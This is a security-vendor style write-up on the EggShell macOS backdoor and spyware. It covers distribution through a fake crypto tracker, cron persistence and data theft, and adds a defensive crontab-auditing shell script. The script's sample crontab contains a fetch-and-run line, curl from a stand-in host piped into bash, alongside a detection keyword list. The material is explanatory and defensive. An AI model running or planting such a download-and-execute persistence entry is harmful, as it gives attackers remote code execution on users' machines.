
EggShell

Posted: April 15, 2020

EggShell is a macOS or OS X backdoor Trojan and spyware that provides attackers with remote system control and data-collecting features. In some scenarios, its installation may include other threats or use disguises like cryptocurrency-tracking applications. Users should curate their downloads appropriately and let compatible anti-malware programs remove EvilEgg with all due expediency.

Trojans Getting the Goods in More than One Way

Although casual macOS users might believe that their operating system is relatively impenetrable, many high-level threats, and even PUPs like adware, have workarounds for Apple's standard security features. As an example of an ongoing security threat to such systems, EggShell provides a generous scope of attacks for any threat actor, even one without much programming experience. As a backdoor Trojan that doubles as spyware, it gives both hands-on and hands-off functionality for criminal purposes.

At least one EggShell campaign circulates the threat by bundling it inside of a corrupted cryptocurrency tracker, the so-called CoinTicker application. In this case, EggShell's installation occurs in the background alongside a very similar Trojan, EvilOSX. Other propagation models are, however, very likely.

EggShell uses the Unix equivalent of a scheduled task, a cron job, for establishing persistence across reboots. If the victim mistakenly enters their password in the pop-up field during installation, it also gains root access and becomes equivalent to a rootkit. With these basics out of the way, malware researchers note the following as EggShell's more acute attacks:

  • The Trojan may download files (such as Trojan installers) and execute them or upload collected ones to a C&C.
  • EggShell has various general-purpose features for collecting information, including taking screenshots, controlling peripherals like cameras or mics (and recording them), and collecting anything the user copies to the clipboard.
  • EggShell also targets Apple-specific services, including, unusually, iTunes. It also may use iMessage for spamming or other attacks.
  • On the social-networking side, it collects Facebook cookies, possibly as a lead-in to compromising accounts.
  • The Trojan also may generate pop-ups, disguised as default OS notifications, for acquiring credentials.
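
Because the cron persistence described above is the part of this behaviour an administrator can audit directly, here is an added example that is not part of the original article: a shell script that scans crontab text for markers typical of scheduled-task persistence (boot-time triggers, download tools piped into interpreters, payloads parked in hidden or temp directories). The heuristics and the sample crontab are constructed assumptions for illustration, not known EggShell indicators.

```shell
#!/usr/bin/env bash
# Constructed sample crontab, not real EggShell indicators: two benign jobs
# plus two entries shaped like the cron persistence the article describes.
SAMPLE_CRONTAB='# nightly log cleanup
0 3 * * * /usr/bin/find /var/log -name "*.gz" -mtime +7 -delete
@reboot /bin/bash -c "curl -fsSL http://example.invalid/stage | bash"
*/5 * * * * /usr/bin/python /Users/alice/.cache/.egg/run.py
30 2 * * 0 /usr/sbin/periodic weekly'

# Heuristics (assumed, not from the article): boot-time triggers, download
# tools, base64 decoding, and programs living in hidden or world-writable
# temp directories. Exit status 0 = suspect, 1 = not flagged.
flag_cron_line() {
  case "$1" in
    ''|\#*) return 1 ;;   # blank lines and comments are never flagged
  esac
  printf '%s' "$1" | grep -Eq \
    '@reboot|curl|wget|base64|/\.[A-Za-z0-9_-]+/|/tmp/|/private/tmp/|/var/tmp/'
}

# Print every suspect entry of a crontab given as text, prefixed with SUSPECT:.
audit_crontab_text() {
  while IFS= read -r line; do
    if flag_cron_line "$line"; then
      printf 'SUSPECT: %s\n' "$line"
    fi
  done <<EOF
$1
EOF
}

# Live check of the current user's crontab; as root, repeat with
# `crontab -u <user> -l` for each account to cover every user's jobs.
audit_current_user_crontab() {
  audit_crontab_text "$(crontab -l 2>/dev/null)"
}

# Running against the constructed sample prints the two suspect entries.
audit_crontab_text "$SAMPLE_CRONTAB"
```

A flagged entry is a lead to inspect by hand, not proof of infection; legitimate jobs occasionally use curl or @reboot too.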

Teaching Your PC to Dance Around Eggshells

Although malware researchers don't rate EggShell's overall features or scope as being unusual, it's a flexible Trojan that performs many functions of use to both for-profit and non-profit spying operations. A threat actor may, via EggShell, hijack others' accounts and use them for propagating the Trojan further, collect content for selling on the dark Web, or install any number of additional threats. Since EggShell is specific to Apple-brand environments, it also shows the limitations of security features that try to block 'risky' applications.

Unusual pop-ups asking for permission or information like passwords are typical symptoms of an attempted backdoor Trojan infection. Besides its known affiliation with CoinTicker or EvilEgg, EggShell could well use other distribution tactics. Many attackers target victims by lacing documents with macros or other exploitative content for dropping their Trojan of choice, with disguises like invoices, memos, hardware notifications or resumes.

Users can disable macros and update software appropriately as defense-strengthening habits against such drive-by-download attacks. Anti-malware products compatible with the relevant OS should also remove EggShell upon detecting it.

EggShell is quite the troublemaker for anyone who acts as if their Macs are invulnerable to the average hacker. Nothing it does is new to the threat landscape, but the breadth of options available to any assailant should make anyone who's downloading an e-mail attachment, or a new application, pause and think about the consequences.
